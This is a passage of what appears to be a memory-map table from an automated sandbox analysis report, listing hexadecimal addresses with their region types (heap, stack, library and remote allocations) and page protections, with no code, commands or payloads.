261E000
|
trusted library allocation
|
page read and write
|
||
7FE898AD000
|
trusted library allocation
|
page execute and read and write
|
||
401000
|
heap
|
page read and write
|
||
2E1D000
|
stack
|
page read and write
|
||
546000
|
heap
|
page read and write
|
||
28C4000
|
trusted library allocation
|
page read and write
|
||
2ABB000
|
stack
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
1C36E000
|
heap
|
page read and write
|
||
470000
|
heap
|
page read and write
|
||
2681000
|
heap
|
page read and write
|
||
21E5000
|
trusted library allocation
|
page read and write
|
||
7FE89A52000
|
trusted library allocation
|
page read and write
|
||
7FE89C2C000
|
trusted library allocation
|
page read and write
|
||
2360000
|
heap
|
page read and write
|
||
233E000
|
stack
|
page read and write
|
||
425000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
23FE000
|
trusted library allocation
|
page read and write
|
||
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
3EF000
|
heap
|
page read and write
|
||
46C3000
|
heap
|
page read and write
|
||
206000
|
heap
|
page read and write
|
||
345000
|
heap
|
page read and write
|
||
1CE89000
|
trusted library section
|
page read and write
|
||
3157000
|
trusted library allocation
|
page read and write
|
||
480000
|
heap
|
page read and write
|
||
1C3F5000
|
heap
|
page read and write
|
||
1C8BB000
|
stack
|
page read and write
|
||
33A6000
|
heap
|
page read and write
|
||
1CFE7000
|
trusted library section
|
page read and write
|
||
47A3000
|
heap
|
page read and write
|
||
24C000
|
heap
|
page read and write
|
||
29D000
|
heap
|
page read and write
|
||
12CFD000
|
trusted library allocation
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
325B000
|
stack
|
page read and write
|
||
48A000
|
heap
|
page read and write
|
||
46DB000
|
heap
|
page read and write
|
||
4DC000
|
heap
|
page read and write
|
||
7FE89880000
|
trusted library allocation
|
page read and write
|
||
2D5000
|
stack
|
page read and write
|
||
366000
|
heap
|
page read and write
|
||
265F000
|
stack
|
page read and write
|
||
28C2000
|
trusted library allocation
|
page read and write
|
||
12E000
|
heap
|
page read and write
|
||
2DF000
|
heap
|
page read and write
|
||
1E43000
|
direct allocation
|
page read and write
|
||
3357000
|
heap
|
page read and write
|
||
C3E000
|
stack
|
page read and write
|
||
7FE898A0000
|
trusted library allocation
|
page read and write
|
||
34F000
|
heap
|
page read and write
|
||
521000
|
heap
|
page read and write
|
||
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
1B2B4000
|
heap
|
page read and write
|
||
7FE898A0000
|
trusted library allocation
|
page read and write
|
||
12DED000
|
trusted library allocation
|
page read and write
|
||
24A5000
|
heap
|
page read and write
|
||
28A7000
|
trusted library allocation
|
page read and write
|
||
480000
|
heap
|
page read and write
|
||
23F3000
|
trusted library allocation
|
page read and write
|
||
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
4771000
|
heap
|
page read and write
|
||
13F000
|
heap
|
page read and write
|
||
2CDF000
|
stack
|
page read and write
|
||
1FE0000
|
remote allocation
|
page read and write
|
||
7FE89A5C000
|
trusted library allocation
|
page read and write
|
||
3007000
|
heap
|
page read and write
|
||
47C000
|
heap
|
page read and write
|
||
43A8000
|
heap
|
page read and write
|
||
1D84000
|
heap
|
page read and write
|
||
18A000
|
heap
|
page read and write
|
||
49AB000
|
heap
|
page read and write
|
||
46C0000
|
heap
|
page read and write
|
||
45A1000
|
heap
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
7FE89940000
|
trusted library allocation
|
page read and write
|
||
1E60000
|
heap
|
page read and write
|
||
380000
|
trusted library allocation
|
page read and write
|
||
180000
|
heap
|
page read and write
|
||
46DB000
|
heap
|
page read and write
|
||
1B0AE000
|
stack
|
page read and write
|
||
4771000
|
heap
|
page read and write
|
||
406E000
|
stack
|
page read and write
|
||
3724000
|
heap
|
page read and write
|
||
2F000
|
heap
|
page read and write
|
||
12F000
|
heap
|
page read and write
|
||
1A710000
|
heap
|
page execute and read and write
|
||
2FE6000
|
heap
|
page read and write
|
||
7FE89C11000
|
trusted library allocation
|
page read and write
|
||
2FD5000
|
heap
|
page read and write
|
||
4A63000
|
heap
|
page read and write
|
||
1C6AE000
|
stack
|
page read and write
|
||
1CA0000
|
direct allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
1C3EC000
|
heap
|
page read and write
|
||
47A1000
|
heap
|
page read and write
|
||
7FE8994C000
|
trusted library allocation
|
page execute and read and write
|
||
4778000
|
heap
|
page read and write
|
||
23F1000
|
trusted library allocation
|
page read and write
|
||
254000
|
heap
|
page read and write
|
||
2D5000
|
heap
|
page read and write
|
||
7FE899B0000
|
trusted library allocation
|
page execute and read and write
|
||
2129000
|
stack
|
page read and write
|
||
1CA7000
|
direct allocation
|
page read and write
|
||
14BED000
|
trusted library allocation
|
page read and write
|
||
4921000
|
heap
|
page read and write
|
||
1B130000
|
heap
|
page read and write
|
||
33D000
|
heap
|
page read and write
|
||
23EE000
|
trusted library allocation
|
page read and write
|
||
7FE89A90000
|
trusted library allocation
|
page read and write
|
||
7FE8994C000
|
trusted library allocation
|
page execute and read and write
|
||
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
1B160000
|
heap
|
page read and write
|
||
4532000
|
heap
|
page read and write
|
||
1CDBA000
|
trusted library section
|
page read and write
|
||
3A8F000
|
trusted library allocation
|
page read and write
|
||
4472000
|
heap
|
page read and write
|
||
1CCAC000
|
trusted library section
|
page read and write
|
||
730000
|
heap
|
page read and write
|
||
32E1000
|
heap
|
page read and write
|
||
470000
|
heap
|
page read and write
|
||
1AC5F000
|
stack
|
page read and write
|
||
1CE55000
|
trusted library section
|
page read and write
|
||
2E0000
|
heap
|
page read and write
|
||
DC000
|
stack
|
page read and write
|
||
1B15F000
|
stack
|
page read and write
|
||
1ABED000
|
heap
|
page read and write
|
||
1A724000
|
heap
|
page execute and read and write
|
||
7FE89A60000
|
trusted library allocation
|
page execute and read and write
|
||
2F1000
|
heap
|
page read and write
|
||
46C000
|
heap
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
23FA000
|
trusted library allocation
|
page read and write
|
||
47EE000
|
heap
|
page read and write
|
||
1BFEF000
|
stack
|
page read and write
|
||
2769000
|
trusted library allocation
|
page read and write
|
||
1EB4000
|
heap
|
page read and write
|
||
2AE000
|
heap
|
page read and write
|
||
1D30000
|
trusted library allocation
|
page read and write
|
||
2100000
|
heap
|
page read and write
|
||
100000
|
heap
|
page read and write
|
||
2C1000
|
heap
|
page read and write
|
||
4B3000
|
heap
|
page read and write
|
||
1DF0000
|
direct allocation
|
page read and write
|
||
3530000
|
trusted library allocation
|
page read and write
|
||
1B350000
|
heap
|
page read and write
|
||
27D8000
|
heap
|
page read and write
|
||
4D2000
|
heap
|
page read and write
|
||
125F1000
|
trusted library allocation
|
page read and write
|
||
354000
|
heap
|
page read and write
|
||
2EBF000
|
stack
|
page read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
179000
|
heap
|
page read and write
|
||
4A67000
|
heap
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
2530000
|
trusted library allocation
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
1CFC7000
|
trusted library section
|
page read and write
|
||
1C55D000
|
stack
|
page read and write
|
||
3F8D000
|
heap
|
page read and write
|
||
2F3000
|
heap
|
page read and write
|
||
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
1B4FF000
|
stack
|
page read and write
|
||
1AEBE000
|
stack
|
page read and write
|
||
2300000
|
trusted library allocation
|
page execute read
|
||
1A55F000
|
stack
|
page read and write
|
||
4400000
|
heap
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
2F4E000
|
stack
|
page read and write
|
||
119000
|
heap
|
page read and write
|
||
1C92D000
|
stack
|
page read and write
|
||
1A988000
|
stack
|
page read and write
|
||
1CFE9000
|
trusted library section
|
page read and write
|
||
1CE9D000
|
trusted library section
|
page read and write
|
||
1D008000
|
trusted library section
|
page read and write
|
||
250F000
|
stack
|
page read and write
|
||
2883000
|
trusted library allocation
|
page read and write
|
||
441B000
|
heap
|
page read and write
|
||
3D0000
|
heap
|
page read and write
|
||
441C000
|
heap
|
page read and write
|
||
344000
|
heap
|
page read and write
|
||
180000
|
heap
|
page read and write
|
||
2883000
|
trusted library allocation
|
page read and write
|
||
1D056000
|
trusted library section
|
page read and write
|
||
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
27C2000
|
trusted library allocation
|
page read and write
|
||
278A000
|
trusted library allocation
|
page read and write
|
||
1DF0000
|
direct allocation
|
page read and write
|
||
2C70000
|
heap
|
page read and write
|
||
1C45B000
|
heap
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
1AA90000
|
heap
|
page read and write
|
||
26F000
|
trusted library allocation
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
34F000
|
heap
|
page read and write
|
||
CB0000
|
heap
|
page read and write
|
||
2790000
|
trusted library allocation
|
page read and write
|
||
278000
|
heap
|
page read and write
|
||
7FE89894000
|
trusted library allocation
|
page read and write
|
||
2797000
|
trusted library allocation
|
page read and write
|
||
1A830000
|
heap
|
page execute and read and write
|
||
4714000
|
heap
|
page read and write
|
||
21AF000
|
stack
|
page read and write
|
||
2AD000
|
heap
|
page read and write
|
||
29D000
|
heap
|
page read and write
|
||
1CE29000
|
trusted library section
|
page read and write
|
||
21F5000
|
trusted library allocation
|
page read and write
|
||
50B000
|
heap
|
page read and write
|
||
1CCB2000
|
trusted library section
|
page read and write
|
||
4C0000
|
heap
|
page read and write
|
||
7FE89976000
|
trusted library allocation
|
page execute and read and write
|
||
7FE898A0000
|
trusted library allocation
|
page read and write
|
||
7FE8995C000
|
trusted library allocation
|
page execute and read and write
|
||
122000
|
heap
|
page read and write
|
||
3B6000
|
heap
|
page read and write
|
||
47A3000
|
heap
|
page read and write
|
||
54E000
|
heap
|
page read and write
|
||
1CDCB000
|
trusted library section
|
page read and write
|
||
334000
|
heap
|
page read and write
|
||
3A8F000
|
trusted library allocation
|
page read and write
|
||
442F000
|
heap
|
page read and write
|
||
35E000
|
heap
|
page read and write
|
||
3302000
|
heap
|
page read and write
|
||
3A89000
|
trusted library allocation
|
page read and write
|
||
3260000
|
trusted library allocation
|
page read and write
|
||
4919000
|
heap
|
page read and write
|
||
1AF9B000
|
stack
|
page read and write
|
||
17E000
|
heap
|
page read and write
|
||
3F4000
|
heap
|
page read and write
|
||
470000
|
heap
|
page read and write
|
||
7FE899B0000
|
trusted library allocation
|
page execute and read and write
|
||
1B46F000
|
stack
|
page read and write
|
||
2A19000
|
trusted library allocation
|
page read and write
|
||
351000
|
heap
|
page read and write
|
||
276B000
|
trusted library allocation
|
page read and write
|
||
145000
|
heap
|
page read and write
|
||
2FD8000
|
heap
|
page read and write
|
||
42C0000
|
heap
|
page read and write
|
||
1C2F0000
|
heap
|
page read and write
|
||
21F2000
|
trusted library allocation
|
page read and write
|
||
192000
|
stack
|
page read and write
|
||
556000
|
heap
|
page read and write
|
||
14B000
|
heap
|
page read and write
|
||
2D8000
|
heap
|
page read and write
|
||
1CC20000
|
trusted library section
|
page read and write
|
||
1DC0000
|
heap
|
page read and write
|
||
1A5FF000
|
stack
|
page read and write
|
||
336A000
|
heap
|
page read and write
|
||
1C66E000
|
stack
|
page read and write
|
||
7FE899C0000
|
trusted library allocation
|
page execute and read and write
|
||
138000
|
heap
|
page read and write
|
||
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
4348000
|
heap
|
page read and write
|
||
124DF000
|
trusted library allocation
|
page read and write
|
||
416A000
|
heap
|
page read and write
|
||
1AD22000
|
heap
|
page read and write
|
||
1CEDC000
|
trusted library section
|
page read and write
|
||
4830000
|
heap
|
page read and write
|
||
2BC000
|
heap
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
3310000
|
trusted library allocation
|
page read and write
|
||
278F000
|
stack
|
page read and write
|
||
37BE000
|
stack
|
page read and write
|
||
393F000
|
stack
|
page read and write
|
||
1CDEA000
|
trusted library section
|
page read and write
|
||
21EA000
|
trusted library allocation
|
page read and write
|
||
2D8000
|
heap
|
page read and write
|
||
13307000
|
trusted library allocation
|
page read and write
|
||
1A92E000
|
stack
|
page read and write
|
||
1ACCB000
|
heap
|
page read and write
|
||
3B69000
|
trusted library allocation
|
page read and write
|
||
1CE35000
|
trusted library section
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
336C000
|
heap
|
page read and write
|
||
453C000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
46DC000
|
heap
|
page read and write
|
||
320000
|
heap
|
page read and write
|
||
1D018000
|
trusted library section
|
page read and write
|
||
1C340000
|
heap
|
page read and write
|
||
2F95000
|
heap
|
page read and write
|
||
4102000
|
heap
|
page read and write
|
||
316000
|
heap
|
page read and write
|
||
1251D000
|
trusted library allocation
|
page read and write
|
||
1CE0A000
|
trusted library section
|
page read and write
|
||
1CE7F000
|
trusted library section
|
page read and write
|
||
1EB0000
|
heap
|
page read and write
|
||
258C000
|
stack
|
page read and write
|
||
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
453E000
|
heap
|
page read and write
|
||
17C000
|
heap
|
page read and write
|
||
21F2000
|
trusted library allocation
|
page read and write
|
||
336A000
|
heap
|
page read and write
|
||
5A5000
|
heap
|
page read and write
|
||
1B530000
|
heap
|
page read and write
|
||
2B5E000
|
stack
|
page read and write
|
||
1AAB4000
|
heap
|
page read and write
|
||
1E10000
|
direct allocation
|
page read and write
|
||
278E000
|
trusted library allocation
|
page read and write
|
||
522000
|
heap
|
page read and write
|
||
4CE000
|
heap
|
page read and write
|
||
2D5000
|
heap
|
page read and write
|
||
24F7000
|
trusted library allocation
|
page read and write
|
||
1CFB000
|
direct allocation
|
page read and write
|
||
23EA000
|
trusted library allocation
|
page read and write
|
||
36E6000
|
heap
|
page read and write
|
||
344000
|
heap
|
page read and write
|
||
122000
|
heap
|
page read and write
|
||
179000
|
heap
|
page read and write
|
||
2F95000
|
heap
|
page read and write
|
||
1DD4000
|
heap
|
page read and write
|
||
29D000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
1C2FA000
|
heap
|
page read and write
|
||
477F000
|
heap
|
page read and write
|
||
482F000
|
heap
|
page read and write
|
||
3315000
|
heap
|
page read and write
|
||
152000
|
heap
|
page read and write
|
||
2005000
|
heap
|
page read and write
|
||
1B2BE000
|
stack
|
page read and write
|
||
336B000
|
heap
|
page read and write
|
||
299000
|
heap
|
page read and write
|
||
49D000
|
heap
|
page read and write
|
||
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
1E79000
|
stack
|
page read and write
|
||
7FE89930000
|
trusted library allocation
|
page execute and read and write
|
||
1B79E000
|
stack
|
page read and write
|
||
276D000
|
trusted library allocation
|
page read and write
|
||
2E8000
|
heap
|
page read and write
|
||
8A9000
|
heap
|
page read and write
|
||
7FE89A57000
|
trusted library allocation
|
page read and write
|
||
278E000
|
trusted library allocation
|
page read and write
|
||
23B0000
|
heap
|
page read and write
|
||
23EF000
|
trusted library allocation
|
page read and write
|
||
1E2F000
|
stack
|
page read and write
|
||
4168000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
7FE898AB000
|
trusted library allocation
|
page read and write
|
||
2D5000
|
heap
|
page read and write
|
||
1C176000
|
heap
|
page read and write
|
||
36000
|
heap
|
page read and write
|
||
333C000
|
heap
|
page read and write
|
||
14E000
|
heap
|
page read and write
|
||
755000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
249000
|
heap
|
page read and write
|
||
2C0000
|
heap
|
page read and write
|
||
1CF10000
|
trusted library section
|
page read and write
|
||
20DF000
|
stack
|
page read and write
|
||
3D4000
|
heap
|
page read and write
|
||
91A000
|
heap
|
page read and write
|
||
4058000
|
heap
|
page read and write
|
||
4778000
|
heap
|
page read and write
|
||
25B000
|
heap
|
page read and write
|
||
4A63000
|
heap
|
page read and write
|
||
2C0000
|
heap
|
page read and write
|
||
1CD64000
|
trusted library section
|
page read and write
|
||
1AD5C000
|
stack
|
page read and write
|
||
1DE0000
|
heap
|
page read and write
|
||
36FF000
|
stack
|
page read and write
|
||
274A000
|
stack
|
page read and write
|
||
480000
|
heap
|
page read and write
|
||
517000
|
heap
|
page read and write
|
||
1C141000
|
heap
|
page read and write
|
||
2F95000
|
heap
|
page read and write
|
||
518000
|
heap
|
page read and write
|
||
82A000
|
heap
|
page read and write
|
||
21EE000
|
trusted library allocation
|
page read and write
|
||
2DD000
|
heap
|
page read and write
|
||
338E000
|
heap
|
page read and write
|
||
19D000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
4058000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
36DA000
|
heap
|
page read and write
|
||
439F000
|
heap
|
page read and write
|
||
119000
|
heap
|
page read and write
|
||
7FE89926000
|
trusted library allocation
|
page read and write
|
||
474000
|
heap
|
page read and write
|
||
1A230000
|
heap
|
page read and write
|
||
43AB000
|
heap
|
page read and write
|
||
7FE89A47000
|
trusted library allocation
|
page read and write
|
||
7FE89A12000
|
trusted library allocation
|
page read and write
|
||
38A6000
|
trusted library allocation
|
page read and write
|
||
460000
|
heap
|
page read and write
|
||
1B60C000
|
stack
|
page read and write
|
||
24F2000
|
trusted library allocation
|
page read and write
|
||
3B30000
|
heap
|
page read and write
|
||
10001000
|
direct allocation
|
page execute and read and write
|
||
5E0000
|
heap
|
page read and write
|
||
7FE89894000
|
trusted library allocation
|
page read and write
|
||
33C000
|
heap
|
page read and write
|
||
1A8EA000
|
stack
|
page read and write
|
||
367000
|
heap
|
page read and write
|
||
464000
|
heap
|
page read and write
|
||
26F000
|
trusted library allocation
|
page read and write
|
||
3BE000
|
heap
|
page read and write
|
||
32F4000
|
heap
|
page read and write
|
||
1CCBA000
|
trusted library section
|
page read and write
|
||
1AD0F000
|
heap
|
page read and write
|
||
4C40000
|
heap
|
page read and write
|
||
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
276E000
|
trusted library allocation
|
page read and write
|
||
1CD42000
|
trusted library section
|
page read and write
|
||
32D5000
|
heap
|
page read and write
|
||
2FDC000
|
heap
|
page read and write
|
||
1C32B000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
1A74F000
|
stack
|
page read and write
|
||
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
32E1000
|
heap
|
page read and write
|
||
43EF000
|
heap
|
page read and write
|
||
33A6000
|
heap
|
page read and write
|
||
25AF000
|
stack
|
page read and write
|
||
1AC65000
|
heap
|
page read and write
|
||
1A6DA000
|
heap
|
page read and write
|
||
313000
|
heap
|
page read and write
|
||
474000
|
remote allocation
|
page execute and read and write
|
||
36EA000
|
heap
|
page read and write
|
||
1AC8B000
|
heap
|
page read and write
|
||
7FE89A57000
|
trusted library allocation
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
3FF000
|
trusted library allocation
|
page read and write
|
||
1B21E000
|
stack
|
page read and write
|
||
1ABD0000
|
heap
|
page read and write
|
||
7FE89A94000
|
trusted library allocation
|
page read and write
|
||
24CF000
|
stack
|
page read and write
|
||
1E80000
|
heap
|
page execute and read and write
|
||
3A4000
|
heap
|
page read and write
|
||
4401000
|
heap
|
page read and write
|
||
2C6000
|
heap
|
page read and write
|
||
124D1000
|
trusted library allocation
|
page read and write
|
||
3574000
|
heap
|
page read and write
|
||
49D8000
|
heap
|
page read and write
|
||
1B23B000
|
stack
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
2AD000
|
heap
|
page read and write
|
||
482F000
|
heap
|
page read and write
|
||
1B324000
|
heap
|
page read and write
|
||
3F70000
|
heap
|
page read and write
|
||
4A6A000
|
heap
|
page read and write
|
||
2896000
|
trusted library allocation
|
page read and write
|
||
3357000
|
heap
|
page read and write
|
||
3F0000
|
trusted library allocation
|
page read and write
|
||
33A1000
|
heap
|
page read and write
|
||
441B000
|
heap
|
page read and write
|
||
12AEF000
|
trusted library allocation
|
page read and write
|
||
2DC000
|
heap
|
page read and write
|
||
47A1000
|
heap
|
page read and write
|
||
368E000
|
stack
|
page read and write
|
||
252C000
|
trusted library allocation
|
page read and write
|
||
7FE89A42000
|
trusted library allocation
|
page read and write
|
||
4A63000
|
heap
|
page read and write
|
||
1A86E000
|
heap
|
page execute and read and write
|
||
127000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
1C7C3000
|
heap
|
page read and write
|
||
3357000
|
heap
|
page read and write
|
||
4A3B000
|
heap
|
page read and write
|
||
314F000
|
trusted library allocation
|
page read and write
|
||
476B000
|
heap
|
page read and write
|
||
7FE89A50000
|
trusted library allocation
|
page execute and read and write
|
||
1A714000
|
heap
|
page execute and read and write
|
||
106000
|
heap
|
page read and write
|
||
517000
|
heap
|
page read and write
|
||
7FE89A94000
|
trusted library allocation
|
page read and write
|
||
1B63E000
|
stack
|
page read and write
|
||
1CDFE000
|
trusted library section
|
page read and write
|
||
33A6000
|
heap
|
page read and write
|
||
12A000
|
heap
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
2F1C000
|
heap
|
page read and write
|
||
3315000
|
heap
|
page read and write
|
||
330000
|
heap
|
page read and write
|
||
33F000
|
heap
|
page read and write
|
||
4166000
|
heap
|
page read and write
|
||
32D4000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
476E000
|
heap
|
page read and write
|
||
1CCB8000
|
trusted library section
|
page read and write
|
||
1A90F000
|
stack
|
page read and write
|
||
1CFE3000
|
trusted library section
|
page read and write
|
||
1D00E000
|
trusted library section
|
page read and write
|
||
3007000
|
heap
|
page read and write
|
||
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
1CE0E000
|
trusted library section
|
page read and write
|
||
7FE8989D000
|
trusted library allocation
|
page execute and read and write
|
||
3524000
|
heap
|
page read and write
|
||
4F7000
|
heap
|
page read and write
|
||
1CD66000
|
trusted library section
|
page read and write
|
||
279D000
|
trusted library allocation
|
page read and write
|
||
2F10000
|
heap
|
page read and write
|
||
2D5000
|
heap
|
page read and write
|
||
3CA1000
|
heap
|
page read and write
|
||
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
3060000
|
trusted library allocation
|
page read and write
|
||
1C3A9000
|
heap
|
page read and write
|
||
173000
|
heap
|
page read and write
|
||
1C2AD000
|
stack
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
2CA000
|
heap
|
page read and write
|
||
441B000
|
heap
|
page read and write
|
||
1C660000
|
heap
|
page read and write
|
||
2207000
|
trusted library allocation
|
page read and write
|
||
346D000
|
stack
|
page read and write
|
||
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
35D0000
|
trusted library allocation
|
page read and write
|
||
2AD000
|
heap
|
page read and write
|
||
305E000
|
stack
|
page read and write
|
||
409000
|
heap
|
page read and write
|
||
7FE899C0000
|
trusted library allocation
|
page execute and read and write
|
||
21F2000
|
trusted library allocation
|
page read and write
|
||
21ED000
|
trusted library allocation
|
page read and write
|
||
1AEEE000
|
stack
|
page read and write
|
||
1BD6000
|
heap
|
page read and write
|
||
1CF0C000
|
trusted library section
|
page read and write
|
||
23EA000
|
trusted library allocation
|
page read and write
|
||
574000
|
heap
|
page read and write
|
||
3B70000
|
trusted library allocation
|
page read and write
|
||
2D60000
|
trusted library allocation
|
page read and write
|
||
1CD31000
|
trusted library section
|
page read and write
|
||
124E1000
|
trusted library allocation
|
page read and write
|
||
2B0000
|
heap
|
page read and write
|
||
7FE89940000
|
trusted library allocation
|
page read and write
|
||
1CE8D000
|
trusted library section
|
page read and write
|
||
3CD0000
|
trusted library allocation
|
page read and write
|
||
1CEAE000
|
trusted library section
|
page read and write
|
||
1B1FF000
|
stack
|
page read and write
|
||
4751000
|
heap
|
page read and write
|
||
2FFE000
|
heap
|
page read and write
|
||
4776000
|
heap
|
page read and write
|
||
3E8000
|
stack
|
page read and write
|
||
1AFC0000
|
heap
|
page read and write
|
||
1CE25000
|
trusted library section
|
page read and write
|
||
15C000
|
stack
|
page read and write
|
||
1CE93000
|
trusted library section
|
page read and write
|
||
2911000
|
trusted library allocation
|
page read and write
|
||
4AC000
|
heap
|
page read and write
|
||
41B000
|
heap
|
page read and write
|
||
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
2DF000
|
heap
|
page read and write
|
||
1A6DC000
|
heap
|
page read and write
|
||
47A5000
|
heap
|
page read and write
|
||
4621000
|
heap
|
page read and write
|
||
1CF34000
|
trusted library section
|
page read and write
|
||
32D5000
|
heap
|
page read and write
|
||
232000
|
heap
|
page read and write
|
||
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
22F6000
|
trusted library allocation
|
page read and write
|
||
143000
|
stack
|
page read and write
|
||
21F2000
|
trusted library allocation
|
page read and write
|
||
3407000
|
direct allocation
|
page read and write
|
||
149000
|
heap
|
page read and write
|
||
231000
|
heap
|
page read and write
|
||
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
453A000
|
heap
|
page read and write
|
||
7FE89A43000
|
trusted library allocation
|
page read and write
|
||
1CE08000
|
trusted library section
|
page read and write
|
||
7FE89976000
|
trusted library allocation
|
page execute and read and write
|
||
13F000
|
heap
|
page read and write
|
||
378000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
3A89000
|
trusted library allocation
|
page read and write
|
||
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
1B2F6000
|
heap
|
page read and write
|
||
4714000
|
heap
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
1A6CF000
|
stack
|
page read and write
|
||
46B000
|
heap
|
page read and write
|
||
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
3357000
|
heap
|
page read and write
|
||
2900000
|
trusted library allocation
|
page read and write
|
||
2AB000
|
heap
|
page read and write
|
||
241E000
|
heap
|
page read and write
|
||
350000
|
heap
|
page read and write
|
||
297F000
|
trusted library allocation
|
page read and write
|
||
17C000
|
heap
|
page read and write
|
||
47F000
|
heap
|
page read and write
|
||
1AB4E000
|
heap
|
page read and write
|
||
1B2DB000
|
stack
|
page read and write
|
||
2291000
|
trusted library allocation
|
page read and write
|
||
310000
|
heap
|
page read and write
|
||
3A89000
|
trusted library allocation
|
page read and write
|
||
7FE89986000
|
trusted library allocation
|
page execute and read and write
|
||
7FE89A4C000
|
trusted library allocation
|
page read and write
|
||
25C1000
|
trusted library allocation
|
page read and write
|
||
210000
|
trusted library allocation
|
page read and write
|
||
4160000
|
heap
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
356000
|
heap
|
page read and write
|
||
436000
|
heap
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
509000
|
heap
|
page read and write
|
||
19E000
|
heap
|
page read and write
|
||
442F000
|
heap
|
page read and write
|
||
336A000
|
heap
|
page read and write
|
||
1A838000
|
heap
|
page execute and read and write
|
||
3CC000
|
heap
|
page read and write
|
||
33AB000
|
heap
|
page read and write
|
||
2FFC000
|
heap
|
page read and write
|
||
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
282000
|
stack
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
482F000
|
heap
|
page read and write
|
||
21E1000
|
trusted library allocation
|
page read and write
|
||
5ED000
|
heap
|
page read and write
|
||
4142000
|
heap
|
page read and write
|
||
478000
|
remote allocation
|
page execute and read and write
|
||
416A000
|
heap
|
page read and write
|
||
3D4000
|
heap
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
4778000
|
heap
|
page read and write
|
||
1B1EF000
|
stack
|
page read and write
|
||
33E0000
|
direct allocation
|
page read and write
|
||
152000
|
heap
|
page read and write
|
||
25DD000
|
stack
|
page read and write
|
||
254D000
|
trusted library allocation
|
page read and write
|
||
2512000
|
trusted library allocation
|
page read and write
|
||
1ACFD000
|
stack
|
page read and write
|
||
1C426000
|
heap
|
page read and write
|
||
260000
|
trusted library allocation
|
page read and write
|
||
4B2000
|
heap
|
page read and write
|
||
4408000
|
heap
|
page read and write
|
||
1CCCF000
|
trusted library section
|
page read and write
|
||
1C19A000
|
heap
|
page read and write
|
||
1CD88000
|
trusted library section
|
page read and write
|
||
36DA000
|
heap
|
page read and write
|
||
7FE8988B000
|
trusted library allocation
|
page read and write
|
||
129CE000
|
trusted library allocation
|
page read and write
|
||
1C12F000
|
stack
|
page read and write
|
||
57A000
|
heap
|
page read and write
|
||
32E1000
|
heap
|
page read and write
|
||
1B640000
|
heap
|
page read and write
|
||
3407000
|
direct allocation
|
page read and write
|
||
4660000
|
heap
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
C70000
|
heap
|
page read and write
|
||
433000
|
heap
|
page read and write
|
||
27D0000
|
trusted library allocation
|
page read and write
|
||
1DAD000
|
stack
|
page read and write
|
||
4E7000
|
heap
|
page read and write
|
||
189000
|
heap
|
page read and write
|
||
3E9000
|
heap
|
page read and write
|
||
253F000
|
stack
|
page read and write
|
||
23F000
|
heap
|
page read and write
|
||
3A89000
|
trusted library allocation
|
page read and write
|
||
36E000
|
heap
|
page read and write
|
||
1FE0000
|
remote allocation
|
page read and write
|
||
7FE89C70000
|
trusted library allocation
|
page read and write
|
||
7FE89C24000
|
